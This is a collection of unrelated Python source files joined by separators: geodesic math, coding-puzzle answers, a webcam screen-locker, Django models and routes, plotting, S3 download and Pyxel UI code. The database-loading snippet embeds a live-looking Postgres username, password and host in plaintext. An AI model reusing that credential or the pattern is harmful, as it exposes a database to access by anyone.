return np.arctan2(np.sin(dLong)*np.cos(lat2*np.pi/180),
np.cos(lat1*np.pi/180)*np.sin(lat2*np.pi/180) - np.sin(lat1*np.pi/180)*np.cos(lat2*np.pi/180)*np.cos(dLong))
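

if __name__ == '__main__':
    # Minimal usage sketch (not part of the original module); the coordinates below
    # are arbitrary example points, used only to show the expected call signature.
    d = latlong2dist(52.2296756, 21.0122287, 52.406374, 16.9251681)
    b = latlong2bearing(52.2296756, 21.0122287, 52.406374, 16.9251681)
    print('distance [m]:', d, 'bearing [rad]:', b)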
|
# A. Love "A"
s = input()
num_of_a = s.count('a')
s_half = len(s) / 2
ans = len(s) if num_of_a > s_half else num_of_a * 2 - 1
print(ans)
|
"""
ChikonEye literally watches your back.
preventing others who peeps your computer from seeing your valuable secret works.
Now your works are safe and secure.
Chikon eye uses your laptop(primary = 0 or secondary = 1, 2 so on) camera to see how
many people are watching at the computer screen. If some1 unauthorized tries to see
it automatically locks the computer screen.
developed by Ashraf Minhaj
mail me at- ashraf_minhaj@yahoo.com
"""
"""
Version: Completely in testing period.
I'll make and executable .exe file so that this can be run on any computer.
right now it can be used by the people who has python, numpy, opencv pyautogui
installed in their pc. Don't worry exe is coming soon.
"""
"""
This is the recognizer code, after creating dataset and training the model
you can use this. Other associated files and codes will be uploaded soon
"""
import numpy as np #numpy library as np
import cv2 #openCv library
import pyautogui #pyautogui
from time import sleep #time library
pyautogui.FAILSAFE = False #pyautogui failsafe to false (see doc)
#location of opencv haarcascade <change according to your file location>
face_cascade = cv2.CascadeClassifier('F:\\opencv\\sources\\data\\haarcascades\\haarcascade_frontalface_alt2.xml')
cap = cv2.VideoCapture(0) # 0 = main camera , 1 = extra connected webcam and so on.
rec = cv2.face.LBPHFaceRecognizer_create()
rec.read("C:\\Users\\HP\\cv_practice\\attempt2\\trainData.yml") #yml file location <change as yours>
id = 0 #set id variable to zero
font = cv2.FONT_HERSHEY_COMPLEX
col = (255, 0, 0)
strk = 2
while True: #This is a forever loop
ret, frame = cap.read() #Capture frame by frame
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) #change color from BGR to Gray
faces = face_cascade.detectMultiScale(gray, scaleFactor = 1.5, minNeighbors = 5)
#print(faces)
for(x, y, w, h) in faces:
#print(x, y, w, h)
roi_gray = gray[y: y+h, x: x+w] #region of interest is face
#*** Drawing Rectangle ***
color = (255, 0, 0)
stroke = 2
end_cord_x = x+w
end_cord_y = y+h
cv2.rectangle(frame, (x,y), (end_cord_x, end_cord_y), color, stroke)
#***detect
id, conf = rec.predict(roi_gray)
#cv2.putText(np.array(roi_gray), str(id), font, 1, col, strk)
print(id) #prints the id's
#if sees unauthorized person
if id != 1 and id != 5 and id == 2 or id == 3 or id == 4 or id == 6 or id == 7:
#execute lock command
pyautogui.hotkey('win', 'r') #win + run key combo
pyautogui.typewrite("cmd\n") # type cmd and 'Enter'= '\n'
sleep(0.500) #a bit delay <needed!>
#windows lock code to command prompt and hit 'Enter'
pyautogui.typewrite("rundll32.exe user32.dll, LockWorkStation\n")
elif id == 1 or id == 5: #if authorized person (me & my Brother Siam)
print("Authorized Person\n") #do nothing
cv2.imshow('ChikonEye', frame)
#check if user wants to quit the program (pressing 'q')
if cv2.waitKey(10) == ord('q'):
x = pyautogui.confirm("Close the Program 'ChikonEye'?")
if x == 'OK':
break
cap.release()
cv2.destroyAllWindows() #remove all windows we have created
|
import requests
import os
from os.path import join, dirname
from dotenv import load_dotenv
import json
# Load environment variables
dotenv_path = join(dirname(__file__), '.env')
load_dotenv(dotenv_path)
API_KEY = os.environ.get("API_KEY")
URL = os.environ.get("URL")
def main():
original_data = get_Api_Parameter(API_KEY)
    print(original_data.text)
def get_Api_Parameter(API_KEY: str,) -> str:
parameter = URL + API_KEY + "&keyword=東京都"
print(parameter)
response = requests.get(parameter)
return response
def pop_Store_data(original_data: str,) -> str:
for store_name in original_data:
pass
if __name__ == '__main__':
main() |
import re
a = ord('a')
z = a+25
S = input()
D = {}
for i in range(a,z+1):
try:
r = re.search(chr(i), S).start()
except AttributeError:
D[chr(i)] = -1
else:
D[chr(i)] = r
ans = ''
for j in D.keys():
ans += str(D[j]) + ' '
print(ans.strip())
# Done |
import os
import sys
import numpy as np
import pandas as pd
import matplotlib
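# Use the non-interactive Agg backend so figures can be rendered and saved without a display.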
matplotlib.use("Agg")
import matplotlib.pyplot as plt
import seaborn
import csv
from yattag import Doc
from yattag import indent
class Plotter(object):
def __init__(self):
self._scalar_data_frame_dict = {}
self._dist_data_frame_dict = {}
def scalar(self, name, step, value, epoch=None):
if isinstance(value, dict):
data = value.copy()
data.update({
'step' : step
})
else:
data = {
'step' : step,
name : value,
}
if epoch is not None:
data['epoch'] = epoch
df = pd.DataFrame(data, index=[0])
if name not in self._scalar_data_frame_dict:
self._scalar_data_frame_dict[name] = df
else:
self._scalar_data_frame_dict[name] = self._scalar_data_frame_dict[name].append(df, ignore_index=True)
def dist(self, name, step, mean, var, epoch=None):
if epoch is not None:
df = pd.DataFrame({'epoch' : epoch, 'step' : step, name+'_mean' : mean, name+'_var' : var }, index=[0])
else:
df = pd.DataFrame({'step' : step, name+'_mean' : mean, name+'_var' : var, }, index=[0])
if name not in self._dist_data_frame_dict:
self._dist_data_frame_dict[name] = df
else:
self._dist_data_frame_dict[name] = self._dist_data_frame_dict[name].append(df, ignore_index=True)
def dist2(self, name, step, value_list, epoch=None):
mean = np.mean(value_list)
var = np.var(value_list)
self.dist(name, step, mean, var, epoch=epoch)
def to_csv(self, output_dir):
" 将记录保存到多个csv文件里面,csv文件放在output_dir下面。"
if not os.path.exists(output_dir):
os.mkdir(output_dir)
for name, data_frame in self._scalar_data_frame_dict.items():
csv_filepath = os.path.join(output_dir, 'scalar_'+name+'.csv')
data_frame.to_csv(csv_filepath, index=False)
for name, data_frame in self._dist_data_frame_dict.items():
csv_filepath = os.path.join(output_dir, 'dist_'+name+'.csv')
data_frame.to_csv(csv_filepath, index=False)
def from_csv(self, output_dir):
" 从output_dir下面的csv文件里面读取并恢复记录 "
csv_name_list = [fn.split('.')[0] for fn in os.listdir(output_dir) if fn.endswith('csv')]
for name in csv_name_list:
if name.startswith('scalar_'):
in_csv = pd.read_csv(os.path.join(output_dir, name+'.csv'))
self._scalar_data_frame_dict[name[len('scalar_'):]] = in_csv
elif name.startswith('dist_'):
self._dist_data_frame_dict[name[len('dist_'):]] = pd.read_csv(os.path.join(output_dir, name+'.csv'))
def write_svg_all(self, output_dir):
" 将所有记录绘制成svg图片 "
for ind, (name, data_frame) in enumerate(self._scalar_data_frame_dict.items()):
output_svg_filepath = os.path.join(output_dir, name+'.svg')
plt.figure()
plt.clf()
headers = [hd for hd in data_frame.columns if hd not in ['step', 'epoch']]
if len(headers) == 1:
plt.plot(data_frame['step'], data_frame[name])
else:
for hd in headers:
plt.plot(data_frame['step'], data_frame[hd])
plt.legend(headers)
plt.tight_layout()
plt.savefig(output_svg_filepath)
plt.close()
for ind, (name, data_frame) in enumerate(self._dist_data_frame_dict.items()):
output_svg_filepath = os.path.join(output_dir, name+'.svg')
plt.figure()
plt.clf()
plt.errorbar(data_frame['step'], data_frame[name+'_mean'], yerr=data_frame[name+'_var'])
plt.tight_layout()
plt.savefig(output_svg_filepath)
plt.close()
def to_html_report(self, output_filepath):
" 将所有记录整理成一个html报告 "
self.write_svg_all(os.path.dirname(output_filepath))
doc, tag, text = Doc().tagtext()
with open(output_filepath, 'w') as outfile:
with tag('html'):
with tag('body'):
with tag('h3'):
text('1. scalars')
for ind, (name, data_frame) in enumerate(self._scalar_data_frame_dict.items()):
with tag('div', style='display:inline-block'):
with tag('h4', style='margin-left:20px'):
text('(%d). '%(ind+1)+name)
doc.stag("embed", style="width:800px;padding:5px;margin-left:20px", src=name+'.svg', type="image/svg+xml")
with tag('h3'):
text('2. distributions')
for ind, (name, data_frame) in enumerate(self._dist_data_frame_dict.items()):
with tag('div', style='display:inline-block'):
with tag('h4', style='margin-left:20px'):
text('(%d). '%(ind+1)+name)
doc.stag("embed", style="width:800px;padding:5px;margin-left:20px", src=name+'.svg', type="image/svg+xml")
result = indent(doc.getvalue())
outfile.write(result)
class BatchPlotter(object):
def __init__(self):
pass
if __name__ == "__main__":
p = Plotter()
# p.scalar('loss', 1, 100)
# p.scalar('loss', 2, 100)
# p.scalar('loss', 3, 100)
# p.scalar('loss', 4, 100)
# p.scalar('loss', 5, 100)
# p.scalar('loss', 6, 100)
# p.scalar('loss', 7, 100)
# p.scalar('loss', 8, 100)
# p.scalar('loss', 9, 100)
# p.scalar('loss', 10, 100)
# p.scalar('loss', 11, 100)
# p.scalar('loss', 12, 100)
# p.scalar('loss2', 1, 100)
# p.scalar('loss2', 2, 100)
# p.scalar('loss2', 3, 100)
# p.scalar('loss2', 4, 100)
# p.scalar('loss2', 5, 100)
# p.scalar('loss2', 6, 100)
# p.scalar('loss2', 7, 100)
# p.scalar('loss2', 8, 100)
# p.scalar('loss2', 9, 100)
# p.scalar('loss2', 10, 100)
# p.scalar('loss2', 11, 100)
# p.scalar('loss2', 12, 100)
# p.dist('loss3', 1, 100.0/1.0, 10)
# p.dist('loss3', 2, 100.0/2.0, 10)
# p.dist('loss3', 3, 100.0/3.0, 10)
# p.dist('loss3', 4, 100.0/4.0, 10)
# p.dist('loss3', 5, 100.0/5.0, 10)
# p.dist('loss3', 6, 100.0/6.0, 10)
# p.dist('loss3', 7, 100.0/7.0, 10)
# p.dist('loss3', 8, 100.0/8.0, 10)
# p.dist('loss3', 9, 100.0/9.0, 10)
# p.dist('loss3', 10, 100.0/10.0, 10)
# p.dist('loss3', 11, 100.0/11.0, 10)
# p.dist('loss3', 12, 100.0/12.0, 10)
p.from_csv('./experiments/main/a/plot_output')
# print(p._scalar_data_frame_dict.headers)
p.to_html_report('./experiments/main/a/plot_output/output.html')
# p.to_csv('./test_csv_output2')
|
from datetime import datetime
from ..names import make_name
def test_make_name():
# str (some with invalid/unwanted chars)
assert make_name('backup name') == 'backup_name'
assert make_name('backup/name') == 'backup!name'
assert make_name('backup::name') == 'backup:name'
# int
assert make_name(1, 2, 3) == '1-2-3'
# datetime
ts = datetime(1999, 12, 31, 23, 59, 59)
assert make_name(ts) == '1999-12-31T23:59:59'
# edge case
assert make_name() == ''
# bytes and safe decoding
assert make_name(b'bytestring') == 'bytestring'
s = 'äöü'
b_utf8 = s.encode('utf-8')
b_iso = s.encode('iso-8859-1')
assert make_name(b_utf8) == s
assert make_name(b_iso) # shall not raise, surrogateescaped
# mixed
assert make_name(s, b_utf8, 1) == 'äöü-äöü-1'
|
team_1 = """
Hippowdon @ Smooth Rock
Ability: Sand Stream
EVs: 252 HP / 4 Atk / 252 Def
Impish Nature
- Stealth Rock
- Earthquake
- Whirlwind
- Slack Off
Dracozolt @ Life Orb
Ability: Sand Rush
EVs: 252 Atk / 4 SpD / 252 Spe
Adamant Nature
- Bolt Beak
- Fire Fang
- Stone Edge
- Outrage
Zapdos-Galar @ Choice Scarf
Ability: Defiant
EVs: 252 Atk / 4 SpD / 252 Spe
Jolly Nature
- Thunderous Kick
- U-turn
- Brave Bird
- Blaze Kick
Ferrothorn @ Leftovers
Ability: Iron Barbs
Shiny: Yes
EVs: 252 HP / 252 Def / 4 SpD
Impish Nature
- Spikes
- Knock Off
- Body Press
- Leech Seed
Tyranitar @ Choice Band
Ability: Sand Stream
EVs: 252 Atk / 4 SpD / 252 Spe
Adamant Nature
- Stone Edge
- Crunch
- Heavy Slam
- Fire Punch
Tapu Fini @ Leftovers
Ability: Misty Surge
EVs: 248 HP / 16 Def / 12 SpA / 40 SpD / 192 Spe
Calm Nature
- Defog
- Moonblast
- Scald
- Taunt
"""
|
"""Chapter 2: Values and Variables
Numeric values
Strings
Variables
Assignment
Identifiers
Reserved words
To delete some variable:
del variable1, variable2, ...
"""
"2.1 Integer and String Values"
# Ex: 4 = integer number
3+4 # Normal arithmetic addition
# 2,468 must be written as 2468; numeric literals cannot contain comma separators
# String = a sequence of characters
# Delimited by single or double quotes ('', "")
# Ex:
"Hello"
# Interpreters always output a string in single quotes
# What if you're missing a matching quotation mark?
"Hello # You'll get an error here
"2.2 Variables and Assignment"
# Assignment statement:
# associates a value with a variable
# = is called the assignment operator
# you can change the value of a same variable later on
x = 10 # Assign the numeric value of 10 to the variable x
print(x)
# You can assign multiple variables in one statement using a tuple assignment
x, y, z = 1, 2, 3
# A tuple is a comma-separated list of expressions
# Only works if both sides contain the same number of elements
x, y = 1, 2, 3  # Error: too many values to unpack
"2.3 Identifiers"
# Identifier = a word used to name things
# Rules:
# Must contain at least one character
# No spaces allowed
# Reserved words are not allowed
# Cannot begin with an integer
"2.4 Floating-point Numbers"
# Floating-point number = non-integers, with decimals
float(123/3)
# Does not allow for infinite decimal places, like pi (3.14)
round(123.334, 2)
"2.5 Control Codes within Strings"
# Special characters within strings that do something
# Denoted by "\", a backslash
# Control Codes:
# \n = newline
# \t = new tab
# \b = backspace
# \\ = backslash
# Examples:
print("Hello \nWorld")
print("Hello \tWorld")
print("Hello \bWorld")
print("Hello \\World")
"2.8 String Formatting"
# print(f"{})
# thing inside brackets is called the positional parameter
# Example:
name = "Matthias"
age = 22
print(f"Hello {name}")
print("Hello {}".format(name))
print("Hello {} who is {}".format(name, age))
"2.9 Multi-line Strings"
# Denoted by the triple string ''', or, """
# Example
"""Hello
How are you today"""
# is the same thing as:
print("Hello \nHow are you today")
"Exercises"
# Exercise 8:
# Yes, you can assign more than one variable in a single statement with a tuple
# Exercise 17:
print("A\nB\nC\nD\nE\nF") |
import csv
import os
from uuid import uuid4
import psycopg2
from psycopg2 import extras
#connect to Database
db_string = "postgres://rfiyeehknxkzti:fcd541969aee3f6c579001a4769f90bb3d27c6e5194c31478217c5010e016a22@ec2-54-227-243-210.compute-1.amazonaws.com:5432/d4dhnjm6dcg7mm"
os.environ["DATABASE_URL"] = db_string
conn = psycopg2.connect(db_string)
cur = conn.cursor()
#Pull CSV into Context
zipListFile = open("zips.csv")
reader = csv.reader(zipListFile)
firstline = True
for ZipCode, City, State, Lat, Long, Population in reader:
if firstline:
firstline = False
continue
GUID = uuid4()
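    # register_uuid() lets psycopg2 adapt the uuid4() GUID directly as a query parameter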
psycopg2.extras.register_uuid()
Lat = float(Lat)
Long = float(Long)
cur.execute("INSERT INTO location VALUES (%s, %s, %s, %s, %s, %s, %s)", ( GUID, ZipCode, City, State, Lat, Long, Population ))
conn.commit() |
from django.urls import path
from . import views
app_name = "task"
urlpatterns = [
path("new_task/", views.new_task, name="new_task"),
path("task_manager/", views.task_manager, name="task_manager"),
path("edit_task/", views.edit_task, name="edit_task"),
path("delete_task/", views.delete_task),
path(
"set_task_extend_state/",
views.set_task_extend_state,
name="set_task_extend_state",
),
path("subtask_manager/", views.subtask_manager),
path("status_manager/", views.status_manager),
]
|
#!/usr/bin/env python
# coding: utf-8
# In[ ]:
# Method Resolution Order (MRO): Python 3 uses C3 linearization (not a plain depth-first search)
class X: pass
class Y: pass
class Z: pass
class A(X,Y): pass
class B(Y,Z): pass
class M(B,A,Z): pass
print(M.__mro__)
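# Expected C3 linearization: (M, B, A, X, Y, Z, object)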
|
import scrapy
class LineItem(scrapy.Item):
name = scrapy.Field()
situation = scrapy.Field()
description = scrapy.Field() |
import subprocess as sp
import tkinter as tk
from tkinter import ttk
topRow = 0
WHITE_COLOR = "#ffffff"
def on_mousewheel(event):
if event.num == 5 or event.delta == -120:
canvas.yview_scroll(1, "units")
if event.num == 4 or event.delta == 120:
canvas.yview_scroll(-1, "units")
class KeyLabel(tk.Label):
def __init__(self, key, row, master=None, *cnf, **kw):
super(KeyLabel, self).__init__(master=master, *cnf, **kw)
self.key = key
self.row = row
self.backGroundColor = "#c4e8f2"
self.bind("<Button-1>", self.renderValues)
def renderValues(self, event):
[row.configure(background=WHITE_COLOR)
for row in scrollable_frame.grid_slaves(column=0)]
self.configure(background=self.backGroundColor)
[row.configure(text="", bg=WHITE_COLOR)
for row in scrollable_frame.grid_slaves(column=1)]
for e, i in enumerate(var_dict[self.key]):
tk.Label(scrollable_frame, text=i, bg=WHITE_COLOR).grid(
column=1, row=self.row+e)
print(i)
# list of all system variables
cmd = ["env"]
proc = sp.Popen(cmd, stdout=sp.PIPE, stderr=sp.PIPE)
o, e = proc.communicate()
variables = str.split(str(o), "\\n")
var_dict = {}
for variable in variables:
# get variable
var = str.split(variable, "=")
# get values
if (len(var) < 2):
continue
val = str.split(var[1], ":")
var_dict[var[0]] = val
print(var_dict['PATH'])
# GUI
root = tk.Tk()
root.title("System variables manager")
root.grid()
container = tk.Frame(root)
container.configure(width=500)
canvas = tk.Canvas(container, bg=WHITE_COLOR)
scrollbar = tk.Scrollbar(container, orient="vertical", command=canvas.yview)
scrollable_frame = tk.Frame(canvas, bg=WHITE_COLOR)
scrollable_frame.grid(sticky="NSWE")
scrollable_frame.bind(
"<Configure>",
lambda e: canvas.configure(
scrollregion=canvas.bbox("all")
)
)
canvas.create_window((0, 0), window=scrollable_frame,
anchor="nw")
canvas.configure(yscrollcommand=scrollbar.set, width=1000)
root.bind("<Button-4>", on_mousewheel)
root.bind("<Button-5>", on_mousewheel)
for e, i in enumerate(var_dict.keys()):
label = KeyLabel(i, e, scrollable_frame, text=i, bg=WHITE_COLOR)
label.grid(row=e, column=0)
container.grid(sticky="NSWE")
canvas.grid(sticky="NSWE")
# Buttons
buttonFrame = tk.Frame(container)
buttonFrame.grid(row=0, column=1)
add = tk.Button(buttonFrame, text="Add")
add.grid(row=0, sticky="N")
remove = tk.Button(buttonFrame, text="Remove")
remove.grid(row=1, sticky="N")
browse = tk.Button(buttonFrame, text="Browse")
browse.grid(row=2, sticky="N")
scrollbar.grid(row=0, column=2, sticky="NSW")
root.mainloop()
|
class Solution(object):
def maxRotateFunction(self, A):
"""
:type A: List[int]
:rtype: int
"""
n = len(A)
m=[]
for i in range(len(A)):
a,b = 0,0
            for j in range(0 - i, 0 - i + n):  # cover all n elements of the rotation, not just the sample length 4
a += A[j] * b
b += 1
b = 0
m.append(a)
return max(m)
if __name__ == '__main__':
A = [4, 3, 2, 6]
print(Solution().maxRotateFunction(A))
|
import boto3
import os
s3 = boto3.resource("s3")
def download_s3_folder(bucket_name, s3_folder, local_dir=None):
"""
Download the contents of a folder directory
Args:
bucket_name: the name of the s3 bucket
s3_folder: the folder path in the s3 bucket
local_dir: a relative or absolute directory path in the local file system
"""
bucket = s3.Bucket(bucket_name)
for obj in bucket.objects.filter(Prefix=s3_folder):
target = (
obj.key
if local_dir is None
else os.path.join(local_dir, os.path.relpath(obj.key, s3_folder))
)
if not os.path.exists(os.path.dirname(target)):
os.makedirs(os.path.dirname(target))
if obj.key[-1] == "/":
continue
bucket.download_file(obj.key, target)
# download_s3_folder("dataops-docs-trybe-us-east-2-679152", "saga/")
download_s3_folder("dataops-docs-trybe-us-east-2-679152", "aiolia/")
|
from vibora.tests import TestSuite
from vibora.blueprints import Blueprint, Response
from vibora.router import RouterStrategy
from vibora import Vibora
class BlueprintsTestCase(TestSuite):
def setUp(self):
self.app = Vibora(router_strategy=RouterStrategy.STRICT)
async def test_simple_add_blueprint__expects_added(self):
b1 = Blueprint()
@b1.route('/')
async def home():
return Response(b'123')
self.app.add_blueprint(b1)
with self.app.test_client() as client:
response = await client.request('/')
self.assertEqual(response.content, b'123')
async def test_simple_add_blueprint_with_prefix_expects_added(self):
b1 = Blueprint()
@b1.route('/')
async def home():
return Response(b'123')
self.app.add_blueprint(b1, prefixes={'home': '/home'})
with self.app.test_client() as client:
response = await client.request('/home/')
self.assertEqual(response.content, b'123')
async def test_simple_add_nested_blueprints(self):
b1 = Blueprint()
b2 = Blueprint()
@b2.route('/123')
async def home():
return Response(b'123')
b1.add_blueprint(b2)
self.app.add_blueprint(b1)
with self.app.test_client() as client:
response = await client.request('/123')
self.assertEqual(response.content, b'123')
async def test_simple_add_nested_blueprints_with_prefixes(self):
b1 = Blueprint()
b2 = Blueprint()
@b2.route('/123')
async def home():
return Response(b'123')
b1.add_blueprint(b2, prefixes={'a': '/a', 'b': '/b'})
self.app.add_blueprint(b1, prefixes={'a': '/a', 'b': '/b'})
with self.app.test_client() as client:
response = await client.request('/a/a/123')
self.assertEqual(response.content, b'123')
response = await self.app.test_client().request('/b/b/123')
self.assertEqual(response.content, b'123')
# def test_routes_added_to_router_with_non_empty_pattern(self):
# b1 = Blueprint()
# new_route = Route('/', lambda: 'Hello', methods=['GET'])
# b1.add_route(new_route)
# v = Vibora(router_strategy=RouteStrategy.STRICT)
# prefixes = {'': '/v1'}
# v.add_blueprint(b1, prefixes=prefixes)
# for route in v.router.routes['GET']:
# if route.pattern == '/v1/':
# return
# self.fail('Failed to find Route.')
#
# def test_nested_blueprints_expects_correct_pattern(self):
# b1 = Blueprint()
# b2 = Blueprint()
# b1.add_blueprint(b2, prefixes={'b2': '/b2'})
# new_route = Route('/', lambda: 'Hello', methods=['GET'], name='hello')
# b2.add_route(new_route)
# v = Vibora(router_strategy=RouteStrategy.STRICT)
# v.add_blueprint(b1, prefixes={'': ''})
# for route in v.router.routes['GET']:
# if route.pattern == '/b2/':
# return
# self.fail('Failed to find Route.')
#
# def test_three_nested_blueprints_expects_correct_pattern(self):
# b1 = Blueprint()
# b2 = Blueprint()
# b3 = Blueprint()
# b1.add_blueprint(b2, prefixes={'b2': '/b2'})
# b2.add_blueprint(b3, prefixes={'b3': '/b3'})
# new_route = Route('/', lambda: 'Hello', methods=['GET'])
# b3.add_route(new_route)
# v = Vibora(router_strategy=RouteStrategy.STRICT)
# v.add_blueprint(b1, prefixes={'': '/b1'})
# for route in v.router.routes['GET']:
# if route.pattern == '/b1/b2/b3/':
# return
# self.fail('Failed to find Route.')
#
# def test_reverse_index_nested_blueprints(self):
# b1 = Blueprint()
# b2 = Blueprint()
# b3 = Blueprint()
# b1.add_blueprint(b2, prefixes={'b2': '/b2'})
# b2.add_blueprint(b3, prefixes={'b3': '/b3'})
# new_route = Route('/', lambda: 'Hello', methods=['GET'], name='hello')
# b3.add_route(new_route)
# v = Vibora(router_strategy=RouteStrategy.STRICT)
# v.add_blueprint(b1, prefixes={'': '/b1'})
# self.assertTrue(
# 'b2:b3.hello' in v.router.reverse_index
# )
#
# def test_reverse_index_nested_blueprints_non_empty(self):
# b1 = Blueprint()
# b2 = Blueprint()
# b3 = Blueprint()
# b1.add_blueprint(b2, prefixes={'b2': '/b2'})
# b2.add_blueprint(b3, prefixes={'b3': '/b3'})
# new_route = Route('/', lambda: 'Hello', methods=['GET'], name='hello')
# b3.add_route(new_route)
# v = Vibora(router_strategy=RouteStrategy.STRICT)
# v.add_blueprint(b1, prefixes={'b1': '/b1'})
# self.assertTrue(
# 'b1:b2:b3.hello' in v.router.reverse_index
# )
|
from django.db import models
from django.contrib.auth.models import Permission, User
class Vare(models.Model):
user = models.ForeignKey(User, default=1, on_delete=models.CASCADE)  # on_delete is required on Django 2.0+
navn = models.CharField(max_length=250)
pris = models.CharField(max_length=20)
alkohol = models.CharField(max_length=10)
volum = models.CharField(max_length=10)
kalkulering = models.CharField(max_length=20)
def __str__(self):
return self.navn + ' - '
class Top(models.Model):
navn = models.CharField(max_length=250)
pris = models.CharField(max_length=20)
alkohol = models.CharField(max_length=10)
volum = models.CharField(max_length=10)
kalkulering = models.CharField(max_length=20)
def __str__(self):
return self.navn + ' - '
|
import itertools
import collections
import asyncio
import mmap
import benchmarking
class benchAsync( benchmarking.BenchFixture ):
def __init__( self ):
self.f = ""
self.deq = None
self.window_size = 2
self.setUp( )
def setUp( self ):
f = open('profiling/SampleData/large_file.txt', 'r+b')
self.f = mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ)
self.deq = collections.deque( )
def tearDown( self ):
pass
async def tokenizeAsync( self, s ):
tokens = s.split( )
await self.skipgramAsync( tokens )
async def bigramAsync( self, sep ):
bigs = [ ]
for k,v in enumerate(sep):
if k == len(sep) - 1:
break
else:
bigs.append((v,sep[k+1]))
await self.countAsync1( bigs )
async def skipgramAsync( self, tokens ):
its = itertools.tee(tokens, 2) # two independent iterators over the tokens, offset by one below
for i, iterator in enumerate(its):
for _ in range(i):
next(iterator)
for block in zip(*its):
await self.flatMapAsync( block )
async def flatMapAsync( self, blocks ):
# grams = flat( blocks )  # ``flat`` is not defined anywhere in this snippet
await self.countAsync1( blocks )
async def countAsync1( self, lst ):
c = collections.Counter(lst)
print(c)
return c
async def mmapAsync( self ): #, q, overall ):
buffer_size = 100000
while True:
buf = self.f.read(buffer_size)
if not buf:
break
# # if you read part way into a word, read some more until you hit a space
# if buf[-1] != 32:
# extra = b""
# while True:
# extra_byte = mmap_file.read(1)
# if extra_byte:
# if extra_byte[0] != 32:
# extra = extra + extra_byte
# else:
# buf = buf + extra + extra_byte
# break
# else:
# break
async def tokenizeAsync2( self, s ):
tokens = s.split( )
await self.pushOnQAsync( tokens )
async def pushOnQAsync( self, t ):
# push tokens onto the deque created in setUp(), then consume it as skip-grams
for i in t:
self.deq.append(i)
await self.skipgramAsync2( )
async def skipgramAsync2( self ):
while True:
if len(self.deq) > 2:
await self.countAsync2( (self.deq[0], self.deq[2]) )
else:
break
async def countAsync2( self, tup ):
self.deq.popleft( )
return tup
async def mainAsync( self ):
await self.mmapAsync( )
def runPipe( self, outfile ):
loop = asyncio.get_event_loop( )
result = loop.run_until_complete( self.mmapAsync( ) )
return result
if __name__ == "__main__":
benchmarking.Benchmark( )
|
# Generated by Django 3.0.2 on 2020-12-02 03:50
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('statemachine', '0003_auto_20201126_1306'),
]
operations = [
migrations.CreateModel(
name='UserState',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('user_id', models.PositiveIntegerField()),
('workflow_id', models.PositiveIntegerField()),
('state', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='statemachine.State')),
],
),
]
|
from django.http import HttpResponse
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "realEstateAdvisor.settings")
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
def index(request):
return HttpResponse("Hello, world. You're at the polls index.")
|
import pyxel
from pyxel.ui import ScrollBar, Widget
from pyxel.ui.constants import WIDGET_HOLD_TIME, WIDGET_REPEAT_TIME
from .constants import (
TOOL_BUCKET,
TOOL_CIRC,
TOOL_CIRCB,
TOOL_PENCIL,
TOOL_RECT,
TOOL_RECTB,
TOOL_SELECT,
)
from .overlay_canvas import OverlayCanvas
class DrawingPanel(Widget):
def __init__(self, parent, *, is_tilemap_mode):
super().__init__(parent, 11, 16, 130, 130)
self._is_tilemap_mode = is_tilemap_mode
self._history_data = None
self.viewport_x = 0
self.viewport_y = 0
self._press_x = 0
self._press_y = 0
self._last_x = 0
self._last_y = 0
self._drag_offset_x = 0
self._drag_offset_y = 0
self._select_x1 = 0
self._select_y1 = 0
self._select_x2 = 0
self._select_y2 = 0
self._copy_buffer = None
self._is_dragged = False
self._is_assist_mode = False
self._overlay_canvas = OverlayCanvas()
self._h_scroll_bar = ScrollBar(
self, 11, 145, 130, ScrollBar.HORIZONTAL, 32, 2, 0
)
self._v_scroll_bar = ScrollBar(self, 140, 16, 130, ScrollBar.VERTICAL, 32, 2, 0)
self.add_event_handler("mouse_down", self.__on_mouse_down)
self.add_event_handler("mouse_up", self.__on_mouse_up)
self.add_event_handler("mouse_click", self.__on_mouse_click)
self.add_event_handler("mouse_drag", self.__on_mouse_drag)
self.add_event_handler("mouse_hover", self.__on_mouse_hover)
self.add_event_handler("update", self.__on_update)
self.add_event_handler("draw", self.__on_draw)
self._h_scroll_bar.add_event_handler("change", self.__on_h_scroll_bar_change)
self._v_scroll_bar.add_event_handler("change", self.__on_v_scroll_bar_change)
def _add_pre_history(self, canvas):
self._history_data = data = {}
if self._is_tilemap_mode:
data["tilemap"] = self.parent.tilemap
else:
data["image"] = self.parent.image
data["pos"] = (self.viewport_x, self.viewport_y)
data["before"] = canvas.copy()
def _add_post_history(self, canvas):
data = self._history_data
data["after"] = canvas.copy()
if (data["before"] != data["after"]).any():
self.parent.add_history(data)
def _screen_to_view(self, x, y):
x = min(max((x - self.x - 1) // 8, 0), 15)
y = min(max((y - self.y - 1) // 8, 0), 15)
return x, y
def __on_mouse_down(self, key, x, y):
if key != pyxel.MOUSE_LEFT_BUTTON:
return
x, y = self._screen_to_view(x, y)
self._press_x = x
self._press_y = y
self._is_dragged = True
self._is_assist_mode = False
if self.parent.tool == TOOL_SELECT:
self._select_x1 = self._select_x2 = x
self._select_y1 = self._select_y2 = y
elif self.parent.tool == TOOL_PENCIL:
self._overlay_canvas.pix(x, y, self.parent.color)
elif TOOL_RECTB <= self.parent.tool <= TOOL_CIRC:
self._overlay_canvas.rect(x, y, x, y, self.parent.color, False)
elif self.parent.tool == TOOL_BUCKET:
data = (
pyxel.tilemap(self.parent.tilemap).data
if self._is_tilemap_mode
else pyxel.image(self.parent.image).data
)
dest = data[
self.viewport_y : self.viewport_y + 16,
self.viewport_x : self.viewport_x + 16,
]
self._add_pre_history(dest)
self._overlay_canvas.fill(x, y, self.parent.color, dest)
self._add_post_history(dest)
self._last_x = x
self._last_y = y
def __on_mouse_up(self, key, x, y):
if key != pyxel.MOUSE_LEFT_BUTTON:
return
self._is_dragged = False
if TOOL_PENCIL <= self.parent.tool <= TOOL_CIRC:
data = (
pyxel.tilemap(self.parent.tilemap).data
if self._is_tilemap_mode
else pyxel.image(self.parent.image).data
)
dest = data[
self.viewport_y : self.viewport_y + 16,
self.viewport_x : self.viewport_x + 16,
]
self._add_pre_history(dest)
index = self._overlay_canvas.data != OverlayCanvas.COLOR_NONE
dest[index] = self._overlay_canvas.data[index]
self._overlay_canvas.clear()
